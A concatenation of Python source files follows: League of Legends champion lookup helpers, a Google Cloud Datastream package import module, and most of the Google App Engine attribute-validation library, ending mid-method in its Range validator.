def get_champ_id(champ_data: dict, champ: str):
"""
note:
must use get_riot_champ_name to pass `champ`
if the name formatting is in question.
i.e. vel'koz is formatted to velkoz and lee sin is leesin in riot's eyes.
"""
return champ_data['data'][champ]['id']
def get_fancy_champ_name(champ_data: dict, champ: str):
return champ_data['data'][champ]['name']
def get_riot_champ_name(champ_data: dict, champ: str):
if champ in champ_data['data']:
return champ
return dm.get_closest(champ_data['data'], champ)
def get_champ_title(champ_data: dict, champ: str):
return champ_data['data'][champ]['title']
def get_summoner_icon(summoner: str, region: str = 'na'):
return f'https://avatar.leagueoflegends.com/{region}/{summoner}.png'
def get_summoner_id(summoner_name):
pass
|
py | 1a49f1c7329afa0c043f2098a620aa2c50d83c50 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.datastream_v1alpha1.services.datastream.client import DatastreamClient
from google.cloud.datastream_v1alpha1.services.datastream.async_client import (
DatastreamAsyncClient,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
CreateConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
CreatePrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import CreateRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import CreateStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
DeleteConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
DeletePrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import DeleteRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import DeleteStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
DiscoverConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
DiscoverConnectionProfileResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import FetchErrorsRequest
from google.cloud.datastream_v1alpha1.types.datastream import FetchErrorsResponse
from google.cloud.datastream_v1alpha1.types.datastream import FetchStaticIpsRequest
from google.cloud.datastream_v1alpha1.types.datastream import FetchStaticIpsResponse
from google.cloud.datastream_v1alpha1.types.datastream import (
GetConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
GetPrivateConnectionRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import GetRouteRequest
from google.cloud.datastream_v1alpha1.types.datastream import GetStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream import (
ListConnectionProfilesRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListConnectionProfilesResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListPrivateConnectionsRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import (
ListPrivateConnectionsResponse,
)
from google.cloud.datastream_v1alpha1.types.datastream import ListRoutesRequest
from google.cloud.datastream_v1alpha1.types.datastream import ListRoutesResponse
from google.cloud.datastream_v1alpha1.types.datastream import ListStreamsRequest
from google.cloud.datastream_v1alpha1.types.datastream import ListStreamsResponse
from google.cloud.datastream_v1alpha1.types.datastream import OperationMetadata
from google.cloud.datastream_v1alpha1.types.datastream import (
UpdateConnectionProfileRequest,
)
from google.cloud.datastream_v1alpha1.types.datastream import UpdateStreamRequest
from google.cloud.datastream_v1alpha1.types.datastream_resources import AvroFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ConnectionProfile,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
DestinationConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Error
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ForwardSshTunnelConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
GcsDestinationConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import GcsProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import JsonFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlColumn
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlDatabase
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlRdbms
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
MysqlSourceConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlSslConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import MysqlTable
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
NoConnectivitySettings,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleColumn
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleProfile
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleRdbms
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleSchema
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
OracleSourceConfig,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import OracleTable
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
PrivateConnection,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
PrivateConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Route
from google.cloud.datastream_v1alpha1.types.datastream_resources import SourceConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
StaticServiceIpConnectivity,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import Stream
from google.cloud.datastream_v1alpha1.types.datastream_resources import Validation
from google.cloud.datastream_v1alpha1.types.datastream_resources import (
ValidationMessage,
)
from google.cloud.datastream_v1alpha1.types.datastream_resources import ValidationResult
from google.cloud.datastream_v1alpha1.types.datastream_resources import VpcPeeringConfig
from google.cloud.datastream_v1alpha1.types.datastream_resources import GcsFileFormat
from google.cloud.datastream_v1alpha1.types.datastream_resources import SchemaFileFormat
__all__ = (
"DatastreamClient",
"DatastreamAsyncClient",
"CreateConnectionProfileRequest",
"CreatePrivateConnectionRequest",
"CreateRouteRequest",
"CreateStreamRequest",
"DeleteConnectionProfileRequest",
"DeletePrivateConnectionRequest",
"DeleteRouteRequest",
"DeleteStreamRequest",
"DiscoverConnectionProfileRequest",
"DiscoverConnectionProfileResponse",
"FetchErrorsRequest",
"FetchErrorsResponse",
"FetchStaticIpsRequest",
"FetchStaticIpsResponse",
"GetConnectionProfileRequest",
"GetPrivateConnectionRequest",
"GetRouteRequest",
"GetStreamRequest",
"ListConnectionProfilesRequest",
"ListConnectionProfilesResponse",
"ListPrivateConnectionsRequest",
"ListPrivateConnectionsResponse",
"ListRoutesRequest",
"ListRoutesResponse",
"ListStreamsRequest",
"ListStreamsResponse",
"OperationMetadata",
"UpdateConnectionProfileRequest",
"UpdateStreamRequest",
"AvroFileFormat",
"ConnectionProfile",
"DestinationConfig",
"Error",
"ForwardSshTunnelConnectivity",
"GcsDestinationConfig",
"GcsProfile",
"JsonFileFormat",
"MysqlColumn",
"MysqlDatabase",
"MysqlProfile",
"MysqlRdbms",
"MysqlSourceConfig",
"MysqlSslConfig",
"MysqlTable",
"NoConnectivitySettings",
"OracleColumn",
"OracleProfile",
"OracleRdbms",
"OracleSchema",
"OracleSourceConfig",
"OracleTable",
"PrivateConnection",
"PrivateConnectivity",
"Route",
"SourceConfig",
"StaticServiceIpConnectivity",
"Stream",
"Validation",
"ValidationMessage",
"ValidationResult",
"VpcPeeringConfig",
"GcsFileFormat",
"SchemaFileFormat",
)
|
py | 1a49f1e8558cd09655641156b082406181ef3852 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Validation tools for generic object structures.
This library is used for defining classes with constrained attributes.
Attributes are defined on the class which contains them using validators.
Although validators can be defined by any client of this library, a number
of standard validators are provided here.
Validators can be any callable that takes a single parameter which checks
the new value before it is assigned to the attribute. Validators are
permitted to modify a received value so that it is appropriate for the
attribute definition. For example, using int as a validator will cast
a correctly formatted string to a number, or raise an exception if it
can not. This is not recommended, however. the correct way to use a
validator that ensure the correct type is to use the Type validator.
This validation library is mainly intended for use with the YAML object
builder. See yaml_object.py.
"""
import re
import google
import yaml
class Error(Exception):
"""Base class for all package errors."""
class AttributeDefinitionError(Error):
"""An error occurred in the definition of class attributes."""
class ValidationError(Error):
"""Base class for raising exceptions during validation."""
def __init__(self, message, cause=None):
"""Initialize exception."""
if hasattr(cause, 'args') and cause.args:
Error.__init__(self, message, *cause.args)
else:
Error.__init__(self, message)
self.message = message
self.cause = cause
def __str__(self):
return str(self.message)
class MissingAttribute(ValidationError):
"""Raised when a required attribute is missing from object."""
def AsValidator(validator):
"""Wrap various types as instances of a validator.
Used to allow shorthand for common validator types. It
converts the following types to the following Validators.
strings -> Regex
type -> Type
collection -> Options
Validator -> Its self!
Args:
validator: Object to wrap in a validator.
Returns:
Validator instance that wraps the given value.
Raises:
AttributeDefinitionError: if validator is not one of the above described
types.
"""
if isinstance(validator, (str, unicode)):
return Regex(validator, type(validator))
if isinstance(validator, type):
return Type(validator)
if isinstance(validator, (list, tuple, set)):
return Options(*tuple(validator))
if isinstance(validator, Validator):
return validator
else:
raise AttributeDefinitionError('%s is not a valid validator' %
str(validator))
def _SimplifiedValue(validator, value):
"""Convert any value to simplified collections and basic types.
Args:
validator: An instance of Validator that corresponds with 'value'.
May also be 'str' or 'int' if those were used instead of a full
Validator.
value: Value to convert to simplified collections.
Returns:
The value as a dictionary if it is a ValidatedBase object. A list of
items converted to simplified collections if value is a list
or a tuple. Otherwise, just the value.
"""
if isinstance(value, ValidatedBase):
return value.ToDict()
elif isinstance(value, (list, tuple)):
return [_SimplifiedValue(validator, item) for item in value]
elif isinstance(validator, Validator):
return validator.ToValue(value)
return value
class ValidatedBase(object):
"""Base class for all validated objects."""
@classmethod
def GetValidator(self, key):
"""Safely get the Validator corresponding to the given key.
This function should be overridden by subclasses
Args:
key: The attribute or item to get a validator for.
Returns:
Validator associated with key or attribute.
Raises:
ValidationError: if the requested key is illegal.
"""
raise NotImplementedError('Subclasses of ValidatedBase must '
'override GetValidator.')
def SetMultiple(self, attributes):
"""Set multiple values on Validated instance.
All attributes will be validated before being set.
Args:
attributes: A dict of attributes/items to set.
Raises:
ValidationError: when no validated attribute exists on class.
"""
for key, value in attributes.iteritems():
self.Set(key, value)
def Set(self, key, value):
"""Set a single value on Validated instance.
This method should be overridded by sub-classes.
This method can only be used to assign validated attributes/items.
Args:
key: The name of the attributes
value: The value to set
Raises:
ValidationError: when no validated attribute exists on class.
"""
raise NotImplementedError('Subclasses of ValidatedBase must override Set.')
def CheckInitialized(self):
"""Checks that all required fields are initialized.
This function is called after all attributes have been checked to
verify any higher level constraints, for example ensuring all required
attributes are present.
Subclasses should override this function and raise an exception for
any errors.
"""
pass
def ToDict(self):
"""Convert ValidatedBase object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Subclasses should override this method.
Returns:
A dictionary mapping all attributes to simple values or collections.
"""
raise NotImplementedError('Subclasses of ValidatedBase must '
'override ToDict.')
def ToYAML(self):
"""Print validated object as simplified YAML.
Returns:
Object as a simplified YAML string compatible with parsing using the
SafeLoader.
"""
return yaml.dump(self.ToDict(),
default_flow_style=False,
Dumper=yaml.SafeDumper)
class Validated(ValidatedBase):
"""Base class for classes that require validation.
A class which intends to use validated fields should sub-class itself from
this class. Each class should define an 'ATTRIBUTES' class variable which
should be a map from attribute name to its validator. For example:
class Story(Validated):
ATTRIBUTES = {'title': Type(str),
'authors': Repeated(Type(str)),
'isbn': Optional(Type(str)),
'pages': Type(int),
}
Attributes that are not listed under ATTRIBUTES work like normal and are
not validated upon assignment.
"""
ATTRIBUTES = None
def __init__(self, **attributes):
"""Constructor for Validated classes.
This constructor can optionally assign values to the class via its
keyword arguments.
Raises:
AttributeDefinitionError: when class instance is missing ATTRIBUTE
definition or when ATTRIBUTE is of the wrong type.
"""
if not isinstance(self.ATTRIBUTES, dict):
raise AttributeDefinitionError(
'The class %s does not define an ATTRIBUTE variable.'
% self.__class__)
for key in self.ATTRIBUTES.keys():
object.__setattr__(self, key, self.GetValidator(key).default)
self.SetMultiple(attributes)
@classmethod
def GetValidator(self, key):
"""Safely get the underlying attribute definition as a Validator.
Args:
key: Name of attribute to get.
Returns:
Validator associated with key or attribute value wrapped in a
validator.
"""
if key not in self.ATTRIBUTES:
raise ValidationError(
'Unexpected attribute \'%s\' for object of type %s.' %
(key, self.__name__))
return AsValidator(self.ATTRIBUTES[key])
def Set(self, key, value):
"""Set a single value on Validated instance.
This method can only be used to assign validated attributes.
Args:
key: The name of the attributes
value: The value to set
Raises:
ValidationError when no validated attribute exists on class.
"""
setattr(self, key, value)
def Get(self, key):
"""Get a single value on Validated instance.
This method can only be used to retrieve validated attributes.
Args:
key: The name of the attributes
Raises:
ValidationError when no validated attribute exists on class.
"""
self.GetValidator(key)
return getattr(self, key)
def CheckInitialized(self):
"""Checks that all required fields are initialized.
Since an instance of Validated starts off in an uninitialized state, it
is sometimes necessary to check that it has been fully initialized.
The main problem this solves is how to validate that an instance has
all of its required fields set. By default, Validator classes do not
allow None, but all attributes are initialized to None when instantiated.
Raises:
Exception relevant to the kind of validation. The type of the exception
is determined by the validator. Typically this will be ValueError or
TypeError.
"""
for key in self.ATTRIBUTES.iterkeys():
try:
self.GetValidator(key)(getattr(self, key))
except MissingAttribute, e:
e.message = "Missing required value '%s'." % key
raise e
def __setattr__(self, key, value):
"""Set attribute.
Setting a value on an object of this type will only work for attributes
defined in ATTRIBUTES. To make other assignments possible it is necessary
to override this method in subclasses.
It is important that assignment is restricted in this way because
this validation is used as validation for parsing. Absent this restriction
it would be possible for method names to be overwritten.
Args:
key: Name of attribute to set.
value: Attributes new value.
Raises:
ValidationError: when trying to assign to an attribute
that does not exist.
"""
value = self.GetValidator(key)(value, key)
object.__setattr__(self, key, value)
def __str__(self):
"""Formatted view of validated object and nested values."""
return repr(self)
def __repr__(self):
"""Formatted view of validated object and nested values."""
values = [(attr, getattr(self, attr)) for attr in self.ATTRIBUTES]
dent = ' '
value_list = []
for attr, value in values:
value_list.append('\n%s%s=%s' % (dent, attr, value))
return "<%s %s\n%s>" % (self.__class__.__name__, ' '.join(value_list), dent)
def __eq__(self, other):
"""Equality operator.
Comparison is done by comparing all attribute values to those in the other
instance. Objects which are not of the same type are not equal.
Args:
other: Other object to compare against.
Returns:
True if validated objects are equal, else False.
"""
if type(self) != type(other):
return False
for key in self.ATTRIBUTES.iterkeys():
if getattr(self, key) != getattr(other, key):
return False
return True
def __ne__(self, other):
"""Inequality operator."""
return not self.__eq__(other)
def __hash__(self):
"""Hash function for using Validated objects in sets and maps.
Hash is done by hashing all keys and values and xor'ing them together.
Returns:
Hash of validated object.
"""
result = 0
for key in self.ATTRIBUTES.iterkeys():
value = getattr(self, key)
if isinstance(value, list):
value = tuple(value)
result = result ^ hash(key) ^ hash(value)
return result
def ToDict(self):
"""Convert Validated object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Returns:
A dict of all attributes defined in this classes ATTRIBUTES mapped
to its value. This structure is recursive in that Validated objects
that are referenced by this object and in lists are also converted to
dicts.
"""
result = {}
for name, validator in self.ATTRIBUTES.iteritems():
value = getattr(self, name)
if not(isinstance(validator, Validator) and value == validator.default):
result[name] = _SimplifiedValue(validator, value)
return result
class ValidatedDict(ValidatedBase, dict):
"""Base class for validated dictionaries.
You can control the keys and values that are allowed in the dictionary
by setting KEY_VALIDATOR and VALUE_VALIDATOR to subclasses of Validator (or
things that can be interpreted as validators, see AsValidator).
For example if you wanted only capitalized keys that map to integers
you could do:
class CapitalizedIntegerDict(ValidatedDict):
KEY_VALIDATOR = Regex('[A-Z].*')
VALUE_VALIDATOR = int # this gets interpreted to Type(int)
The following code would result in an error:
my_dict = CapitalizedIntegerDict()
my_dict['lowercase'] = 5 # Throws a validation exception
You can freely nest Validated and ValidatedDict inside each other so:
class MasterObject(Validated):
ATTRIBUTES = {'paramdict': CapitalizedIntegerDict}
Could be used to parse the following yaml:
paramdict:
ArbitraryKey: 323
AnotherArbitraryKey: 9931
"""
KEY_VALIDATOR = None
VALUE_VALIDATOR = None
def __init__(self, **kwds):
"""Construct a validated dict by interpreting the key and value validators.
Args:
**kwds: keyword arguments will be validated and put into the dict.
"""
self.update(kwds)
@classmethod
def GetValidator(self, key):
"""Check the key for validity and return a corresponding value validator.
Args:
key: The key that will correspond to the validator we are returning.
"""
key = AsValidator(self.KEY_VALIDATOR)(key, 'key in %s' % self.__name__)
return AsValidator(self.VALUE_VALIDATOR)
def __setitem__(self, key, value):
"""Set an item.
Only attributes accepted by GetValidator and values that validate
with the validator returned from GetValidator are allowed to be set
in this dictionary.
Args:
key: Name of item to set.
value: Items new value.
Raises:
ValidationError: when trying to assign to a value that does not exist.
"""
dict.__setitem__(self, key, self.GetValidator(key)(value, key))
def setdefault(self, key, value=None):
"""Trap setdefaultss to ensure all key/value pairs are valid.
See the documentation for setdefault on dict for usage details.
Raises:
ValidationError: if the specified key is illegal or the
value invalid.
"""
return dict.setdefault(self, key, self.GetValidator(key)(value, key))
def update(self, other, **kwds):
"""Trap updates to ensure all key/value pairs are valid.
See the documentation for update on dict for usage details.
Raises:
ValidationError: if any of the specified keys are illegal or
values invalid.
"""
if hasattr(other, 'keys') and callable(getattr(other, 'keys')):
newother = {}
for k in other:
newother[k] = self.GetValidator(k)(other[k], k)
else:
newother = [(k, self.GetValidator(k)(v, k)) for (k, v) in other]
newkwds = {}
for k in kwds:
newkwds[k] = self.GetValidator(k)(kwds[k], k)
dict.update(self, newother, **newkwds)
def Set(self, key, value):
"""Set a single value on Validated instance.
This method checks that a given key and value are valid and if so
puts the item into this dictionary.
Args:
key: The name of the attributes
value: The value to set
Raises:
ValidationError: when no validated attribute exists on class.
"""
self[key] = value
def ToDict(self):
"""Convert ValidatedBase object to a dictionary.
Recursively traverses all of its elements and converts everything to
simplified collections.
Subclasses should override this method.
Returns:
A dictionary mapping all attributes to simple values or collections.
"""
result = {}
for name, value in self.iteritems():
validator = self.GetValidator(name)
result[name] = _SimplifiedValue(validator, value)
return result
class Validator(object):
"""Validator base class.
Though any callable can be used as a validator, this class encapsulates the
case when a specific validator needs to hold a particular state or
configuration.
To implement Validator sub-class, override the validate method.
This class is permitted to change the ultimate value that is set to the
attribute if there is a reasonable way to perform the conversion.
"""
expected_type = object
def __init__(self, default=None):
"""Constructor.
Args:
default: Default assignment is made during initialization and will
not pass through validation.
"""
self.default = default
def __call__(self, value, key='???'):
"""Main interface to validator is call mechanism."""
return self.Validate(value, key)
def Validate(self, value, key='???'):
"""Override this method to customize sub-class behavior.
Args:
value: Value to validate.
key: Name of the field being validated.
Returns:
Value if value is valid, or a valid representation of value.
"""
return value
def ToValue(self, value):
"""Convert 'value' to a simplified collection or basic type.
Subclasses of Validator should override this method when the dumped
representation of 'value' is not simply <type>(value) (e.g. a regex).
Args:
value: An object of the same type that was returned from Validate().
Returns:
An instance of a builtin type (e.g. int, str, dict, etc). By default
it returns 'value' unmodified.
"""
return value
class Type(Validator):
"""Verifies property is of expected type.
Can optionally convert value if it is not of the expected type.
It is possible to specify a required field of a specific type in shorthand
by merely providing the type. This method is slightly less efficient than
providing an explicit type but is not significant unless parsing a large
amount of information:
class Person(Validated):
ATTRIBUTES = {'name': unicode,
'age': int,
}
However, in most instances it is best to use the type constants:
class Person(Validated):
ATTRIBUTES = {'name': TypeUnicode,
'age': TypeInt,
}
"""
def __init__(self, expected_type, convert=True, default=None):
"""Initialize Type validator.
Args:
expected_type: Type that attribute should validate against.
convert: Cause conversion if value is not the right type.
Conversion is done by calling the constructor of the type
with the value as its first parameter.
default: Default assignment is made during initialization and will
not pass through validation.
"""
super(Type, self).__init__(default)
self.expected_type = expected_type
self.convert = convert
def Validate(self, value, key):
"""Validate that value has the correct type.
Args:
value: Value to validate.
key: Name of the field being validated.
Returns:
value if value is of the correct type. value is coverted to the correct
type if the Validator is configured to do so.
Raises:
MissingAttribute: if value is None and the expected type is not NoneType.
ValidationError: if value is not of the right type and the validator
is either configured not to convert or cannot convert.
"""
if not isinstance(value, self.expected_type):
if value is None:
raise MissingAttribute('Missing value is required.')
if self.convert:
try:
return self.expected_type(value)
except ValueError, e:
raise ValidationError(
'Value %r for %s could not be converted to type %s.' % (
value, key, self.expected_type.__name__), e)
except TypeError, e:
raise ValidationError(
'Value %r for %s is not of the expected type %s' % (
value, key, self.expected_type.__name__), e)
else:
raise ValidationError(
'Value %r for %s is not of the expected type %s' % (
value, key, self.expected_type.__name__))
else:
return value
TYPE_BOOL = Type(bool)
TYPE_INT = Type(int)
TYPE_LONG = Type(long)
TYPE_STR = Type(str)
TYPE_UNICODE = Type(unicode)
TYPE_FLOAT = Type(float)
class Options(Validator):
"""Limit field based on pre-determined values.
Options are used to make sure an enumerated set of values are the only
one permitted for assignment. It is possible to define aliases which
map multiple string values to a single original. An example of usage:
class ZooAnimal(validated.Class):
ATTRIBUTES = {
'name': str,
'kind': Options('platypus', # No aliases
('rhinoceros', ['rhino']), # One alias
('canine', ('dog', 'puppy')), # Two aliases
)
"""
def __init__(self, *options, **kw):
"""Initialize options.
Args:
options: List of allowed values.
"""
if 'default' in kw:
default = kw['default']
else:
default = None
alias_map = {}
def AddAlias(alias, original):
"""Set new alias on alias_map.
Raises:
AttributeDefinitionError: when option already exists or if alias is
not of type str.
"""
if not isinstance(alias, str):
raise AttributeDefinitionError(
'All option values must be of type str.')
elif alias in alias_map:
raise AttributeDefinitionError(
"Option '%s' already defined for options property." % alias)
alias_map[alias] = original
for option in options:
if isinstance(option, str):
AddAlias(option, option)
elif isinstance(option, (list, tuple)):
if len(option) != 2:
raise AttributeDefinitionError("Alias is defined as a list of tuple "
"with two items. The first is the "
"original option, while the second "
"is a list or tuple of str aliases.\n"
"\n Example:\n"
" ('original', ('alias1', "
"'alias2'")
original, aliases = option
AddAlias(original, original)
if not isinstance(aliases, (list, tuple)):
raise AttributeDefinitionError('Alias lists must be a list or tuple')
for alias in aliases:
AddAlias(alias, original)
else:
raise AttributeDefinitionError("All options must be of type str "
"or of the form (str, [str...]).")
super(Options, self).__init__(default)
self.options = alias_map
def Validate(self, value, key):
"""Validate options.
Returns:
Original value for provided alias.
Raises:
ValidationError: when value is not one of predefined values.
"""
if value is None:
raise ValidationError('Value for options field must not be None.')
value = str(value)
if value not in self.options:
raise ValidationError('Value \'%s\' for %s not in %s.'
% (value, key, self.options))
return self.options[value]
class Optional(Validator):
"""Definition of optional attributes.
Optional values are attributes which can be set to None or left
unset. All values in a basic Validated class are set to None
at initialization. Failure to assign to non-optional values
will result in a validation error when calling CheckInitialized.
"""
def __init__(self, validator, default=None):
"""Initializer.
This constructor will make a few guesses about the value passed in
as the validator:
- If the validator argument is a type, it automatically creates a Type
validator around it.
- If the validator argument is a list or tuple, it automatically
creates an Options validator around it.
Args:
validator: Optional validation condition.
Raises:
AttributeDefinitionError: if validator is not callable.
"""
self.validator = AsValidator(validator)
self.expected_type = self.validator.expected_type
self.default = default
def Validate(self, value, key):
"""Optionally require a value.
Normal validators do not accept None. This will accept none on
behalf of the contained validator.
Args:
value: Value to be validated as optional.
key: Name of the field being validated.
Returns:
None if value is None, else results of contained validation.
"""
if value is None:
return None
return self.validator(value, key)
def ToValue(self, value):
"""Convert 'value' to a simplified collection or basic type."""
if value is None:
return None
return self.validator.ToValue(value)
class Regex(Validator):
"""Regular expression validator.
Regular expression validator always converts value to string. Note that
matches must be exact. Partial matches will not validate. For example:
class ClassDescr(Validated):
ATTRIBUTES = { 'name': Regex(r'[a-zA-Z_][a-zA-Z_0-9]*'),
'parent': Type(type),
}
Alternatively, any attribute that is defined as a string is automatically
interpreted to be of type Regex. It is possible to specify unicode regex
strings as well. This approach is slightly less efficient, but usually
is not significant unless parsing large amounts of data:
class ClassDescr(Validated):
ATTRIBUTES = { 'name': r'[a-zA-Z_][a-zA-Z_0-9]*',
'parent': Type(type),
}
# This will raise a ValidationError exception.
my_class(name='AName with space', parent=AnotherClass)
"""
def __init__(self, regex, string_type=unicode, default=None):
"""Initialized regex validator.
Args:
regex: Regular expression string to use for comparison.
Raises:
AttributeDefinitionError: if string_type is not a kind of string.
"""
super(Regex, self).__init__(default)
if (not issubclass(string_type, basestring) or
string_type is basestring):
raise AttributeDefinitionError(
'Regex fields must be a string type not %s.' % str(string_type))
if isinstance(regex, basestring):
self.re = re.compile('^(?:%s)$' % regex)
else:
raise AttributeDefinitionError(
'Regular expression must be string. Found %s.' % str(regex))
self.expected_type = string_type
def Validate(self, value, key):
"""Does validation of a string against a regular expression.
Args:
value: String to match against regular expression.
key: Name of the field being validated.
Raises:
ValidationError: when value does not match regular expression or
when value does not match provided string type.
"""
if issubclass(self.expected_type, str):
cast_value = TYPE_STR(value)
else:
cast_value = TYPE_UNICODE(value)
if self.re.match(cast_value) is None:
raise ValidationError('Value \'%s\' for %s does not match expression '
'\'%s\'' % (value, key, self.re.pattern))
return cast_value
class _RegexStrValue(object):
"""Simulates the regex object to support recompilation when necessary.
Used by the RegexStr class to dynamically build and recompile regular
expression attributes of a validated object. This object replaces the normal
object returned from re.compile which is immutable.
When the value of this object is a string, that string is simply used as the
regular expression when recompilation is needed. If the state of this object
is a list of strings, the strings are joined in to a single 'or' expression.
"""
def __init__(self, attribute, value, key):
"""Initialize recompilable regex value.
Args:
attribute: Attribute validator associated with this regex value.
value: Initial underlying python value for regex string. Either a single
regex string or a list of regex strings.
key: Name of the field.
"""
self.__attribute = attribute
self.__value = value
self.__regex = None
self.__key = key
def __AsString(self, value):
"""Convert a value to appropriate string.
Returns:
String version of value with all carriage returns and line feeds removed.
"""
if issubclass(self.__attribute.expected_type, str):
cast_value = TYPE_STR(value)
else:
cast_value = TYPE_UNICODE(value)
cast_value = cast_value.replace('\n', '')
cast_value = cast_value.replace('\r', '')
return cast_value
def __BuildRegex(self):
"""Build regex string from state.
Returns:
String version of regular expression. Sequence objects are constructed
as larger regular expression where each regex in the list is joined with
all the others as single 'or' expression.
"""
if isinstance(self.__value, list):
value_list = self.__value
sequence = True
else:
value_list = [self.__value]
sequence = False
regex_list = []
for item in value_list:
regex_list.append(self.__AsString(item))
if sequence:
return '|'.join('%s' % item for item in regex_list)
else:
return regex_list[0]
def __Compile(self):
"""Build regular expression object from state.
Returns:
Compiled regular expression based on internal value.
"""
regex = self.__BuildRegex()
try:
return re.compile(regex)
except re.error, e:
raise ValidationError('Value \'%s\' for %s does not compile: %s' %
(regex, self.__key, e), e)
@property
def regex(self):
"""Compiled regular expression as described by underlying value."""
return self.__Compile()
def match(self, value):
"""Match against internal regular expression.
Returns:
Regular expression object built from underlying value.
"""
return re.match(self.__BuildRegex(), value)
def Validate(self):
"""Ensure that regex string compiles."""
self.__Compile()
def __str__(self):
"""Regular expression string as described by underlying value."""
return self.__BuildRegex()
def __eq__(self, other):
"""Comparison against other regular expression string values."""
if isinstance(other, _RegexStrValue):
return self.__BuildRegex() == other.__BuildRegex()
return str(self) == other
def __ne__(self, other):
"""Inequality operator for regular expression string value."""
return not self.__eq__(other)
class RegexStr(Validator):
"""Validates that a string can compile as a regex without errors.
Use this validator when the value of a field should be a regex. That
means that the value must be a string that can be compiled by re.compile().
The attribute will then be a compiled re object.
"""
def __init__(self, string_type=unicode, default=None):
"""Initialized regex validator.
Raises:
AttributeDefinitionError: if string_type is not a kind of string.
"""
if default is not None:
default = _RegexStrValue(self, default, None)
re.compile(str(default))
super(RegexStr, self).__init__(default)
if (not issubclass(string_type, basestring) or
string_type is basestring):
raise AttributeDefinitionError(
'RegexStr fields must be a string type not %s.' % str(string_type))
self.expected_type = string_type
def Validate(self, value, key):
"""Validates that the string compiles as a regular expression.
Because the regular expression might have been expressed as a multiline
string, this function also strips newlines out of value.
Args:
value: String to compile as a regular expression.
key: Name of the field being validated.
Raises:
ValueError when value does not compile as a regular expression. TypeError
when value does not match provided string type.
"""
if isinstance(value, _RegexStrValue):
return value
value = _RegexStrValue(self, value, key)
value.Validate()
return value
def ToValue(self, value):
"""Returns the RE pattern for this validator."""
return str(value)
class Range(Validator):
"""Validates that numbers fall within the correct range.
In theory this class can be emulated using Options, however error
messages generated from that class will not be very intelligible.
This class essentially does the same thing, but knows the intended
integer range.
Also, this range class supports floats and other types that implement
ordinality.
The range is inclusive, meaning 3 is considered in the range
in Range(1,3).
"""
def __init__(self, minimum, maximum, range_type=int, default=None):
"""Initializer for range.
At least one of minimum and maximum must be supplied.
Args:
minimum: Minimum for attribute.
maximum: Maximum for attribute.
range_type: Type of field. Defaults to int.
Raises:
AttributeDefinitionError: if the specified parameters are incorrect.
"""
super(Range, self).__init__(default)
if minimum is None and maximum is None:
raise AttributeDefinitionError('Must specify minimum or maximum.')
if minimum is not None and not isinstance(minimum, range_type):
raise AttributeDefinitionError(
'Minimum value must be of type %s, instead it is %s (%s).' %
(str(range_type), str(type(minimum)), str(minimum)))
if maximum is not None and not isinstance(maximum, range_type):
raise AttributeDefinitionError(
'Maximum value must be of type %s, instead it is %s (%s).' %
(str(range_type), str(type(maximum)), str(maximum)))
self.minimum = minimum
self.maximum = maximum
self.expected_type = range_type
self._type_validator = Type(range_type)
def Validate(self, value, key):
"""Validate that value is within range.
